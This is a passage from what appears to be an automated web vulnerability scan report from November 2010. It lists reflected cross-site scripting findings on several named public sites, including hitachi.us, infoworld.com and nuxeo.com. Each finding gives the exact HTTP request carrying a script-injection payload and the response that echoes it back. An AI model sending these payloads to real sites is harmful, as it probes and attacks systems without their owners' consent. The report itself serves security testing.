This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22?8922a"><script>alert(1)</script>a92afe48dc7=1 HTTP/1.1
Host: www.cinemablend.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:21:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=992ea87f1dcff16a0cc94a9b632ae716; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 41381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Google's Online Sto
...[SNIP]...
<input type="hidden" name="return_to" value="/technology/Google-s-Online-Storage-Services-Go-Live-5780.html/x22?8922a"><script>alert(1)</script>a92afe48dc7=1" />
...[SNIP]...

4.403. http://www.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload ffeb2%0aalert(1)//9751a364281 was submitted in the url parameter. This input was echoed as ffeb2
alert(1)//9751a364281
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://google-code-feed-gadget.googlecode.com/svn/build/prod/feedgadget/feedgadget.xmlffeb2%0aalert(1)//9751a364281 HTTP/1.1
Host: www.gmodules.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Mon, 15 Nov 2010 07:40:21 GMT
Expires: Mon, 15 Nov 2010 07:40:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

Unable to retrieve spec for http://google-code-feed-gadget.googlecode.com/svn/build/prod/feedgadget/feedgadget.xmlffeb2
alert(1)//9751a364281
. HTTP error 400

4.404. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hitachi.us
Path:   /connected/#/data/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec033"><script>alert(1)</script>9dbcf66fc16 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /connected/#ec033"><script>alert(1)</script>9dbcf66fc16/data/x22 HTTP/1.1
Host: www.hitachi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:47:44 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7d
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=6759e8d6e059b7cc0fdc9b5388301ed5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10695


<!DOCTYPE html PUBLIC"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a href="http://www.twitter.com/?status=Reading++http://www.hitachi.us/connected/#ec033"><script>alert(1)</script>9dbcf66fc16/data/x22" target="_blank">
...[SNIP]...

4.405. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hitachi.us
Path:   /connected/#/data/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac915"><script>alert(1)</script>575a6a12d82 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /connected/#/dataac915"><script>alert(1)</script>575a6a12d82/x22 HTTP/1.1
Host: www.hitachi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:47:45 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7d
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9db68401ef7af1aa77ecbd8762c612d7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10695


<!DOCTYPE html PUBLIC"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a href="http://www.twitter.com/?status=Reading++http://www.hitachi.us/connected/#/dataac915"><script>alert(1)</script>575a6a12d82/x22" target="_blank">
...[SNIP]...

4.406. http://www.hitachi.us/connected/#/data/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hitachi.us
Path:   /connected/#/data/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fce3e"><script>alert(1)</script>a02db8fe96f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /connected/#/data/x22fce3e"><script>alert(1)</script>a02db8fe96f HTTP/1.1
Host: www.hitachi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:47:46 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7d
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=16d8f38e0ebcd5fbca0f49aa242a6b0f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10695


<!DOCTYPE html PUBLIC"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a href="http://www.twitter.com/?status=Reading++http://www.hitachi.us/connected/#/data/x22fce3e"><script>alert(1)</script>a02db8fe96f" target="_blank">
...[SNIP]...

4.407. http://www.hitachi.us/connected/#/data/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hitachi.us
Path:   /connected/#/data/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d473"><script>alert(1)</script>2401ab8b51a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /connected/#/data/x22?1d473"><script>alert(1)</script>2401ab8b51a=1 HTTP/1.1
Host: www.hitachi.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:47:42 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6 mod_ssl/2.2.9 OpenSSL/0.9.7d
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=7195d345499042c40510caf24d8c248f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 10729


<!DOCTYPE html PUBLIC"-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" dir="ltr">
<head>
<meta
...[SNIP]...
<a href="http://www.twitter.com/?status=Reading++http://www.hitachi.us/connected/#/data/x22?1d473"><script>alert(1)</script>2401ab8b51a=1" target="_blank">
...[SNIP]...

4.408. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f302"><script>alert(1)</script>60793e7541d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d5f302"><script>alert(1)</script>60793e7541d/cloud-computing/what-cloud-computing-really-means-031/x22 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:48:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:48:03 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818083-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48545

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/d5f302"><script>alert(1)</script>60793e7541d/cloud-computing/what-cloud-computing-really-means-031/x22" />
...[SNIP]...

4.409. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be15d"><script>alert(1)</script>496300b77fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computingbe15d"><script>alert(1)</script>496300b77fc/what-cloud-computing-really-means-031/x22 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:48:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:48:06 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818086-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/d/cloud-computingbe15d"><script>alert(1)</script>496300b77fc/what-cloud-computing-really-means-031/x22" />
...[SNIP]...

4.410. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45143"%3bfb863c7a462 was submitted in the REST URL parameter 2. This input was echoed as 45143";fb863c7a462 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /d/cloud-computing45143"%3bfb863c7a462/what-cloud-computing-really-means-031/x22 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 10:48:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:48:07 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818087-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<!--
var url_topic = "Cloud Computing45143";fb863c7a462"
//-->
...[SNIP]...

4.411. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96407"><script>alert(1)</script>83d94ef9100 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/what-cloud-computing-really-means-03196407"><script>alert(1)</script>83d94ef9100/x22 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:48:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:48:21 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818101-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/user?destination=d/cloud-computing/what-cloud-computing-really-means-03196407"><script>alert(1)</script>83d94ef9100/x22">
...[SNIP]...

4.412. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce644"><script>alert(1)</script>dda49c1bb27 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/what-cloud-computing-really-means-031/x22ce644"><script>alert(1)</script>dda49c1bb27 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:48:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:48:24 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818104-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 72046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/user?destination=d/cloud-computing/what-cloud-computing-really-means-031/x22ce644"><script>alert(1)</script>dda49c1bb27">
...[SNIP]...

4.413. http://www.infoworld.com/d/cloud-computing/what-cloud-computing-really-means-031/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/what-cloud-computing-really-means-031/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ba74"><script>alert(1)</script>18b50b71d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/what-cloud-computing-really-means-031/x22?8ba74"><script>alert(1)</script>18b50b71d7e=1 HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 10:47:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Mon, 15 Nov 2010 10:47:59 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1289818079-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 73494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/user?destination=d/cloud-computing/what-cloud-computing-really-means-031/x22&8ba74"><script>alert(1)</script>18b50b71d7e=1">
...[SNIP]...

4.414. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload f0bfc--><script>alert(1)</script>c7ef7c6008c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:08:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=b8b8b46a7bc7fb2aa263ffef59cc9a84; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:08:48 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embeddedf0bfc--><script>alert(1)</script>c7ef7c6008c/yellow-ribbon-en/-->
...[SNIP]...

4.415. http://www.nuxeo.com/embedded/yellow-ribbon-en [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /embedded/yellow-ribbon-en

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 49edf--><script>alert(1)</script>68af400bc97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.nuxeo.org/xwiki/bin/view/Main/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.nuxeo.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:09:10 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Set-Cookie: eZSESSID=8ce74b880425f816357426d1731ae108; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:09:10 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 33672

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/embedded/yellow-ribbon-en49edf--><script>alert(1)</script>68af400bc97/-->
...[SNIP]...

4.416. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 2d2b4--><script>alert(1)</script>159f19a261e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:18:24 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en2d2b4--><script>alert(1)</script>159f19a261e/about/events/nuxeoworld2010/-->
...[SNIP]...

4.417. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload a5297--><script>alert(1)</script>3cc6fdb1f92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:06 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 15 Nov 2010 14:19:06 GMT
Served-by: www.nuxeo.com
Content-language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 33713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<hea
...[SNIP]...
<!--/en/abouta5297--><script>alert(1)</script>3cc6fdb1f92/events/nuxeoworld2010/-->
...[SNIP]...

4.418. http://www.nuxeo.com/en/about/events/nuxeoworld2010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.com
Path:   /en/about/events/nuxeoworld2010

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f5c36--><script>alert(1)</script>d4ffa27e9fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /en/about/eventsf5c36--><script>alert(1)</script>d4ffa27e9fd/nuxeoworld2010 HTTP/1.1
Host: www.nuxeo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: eZSESSID=6b9813c12cd856e64db65c55d01947a8;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:19:47 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: eZ Publish
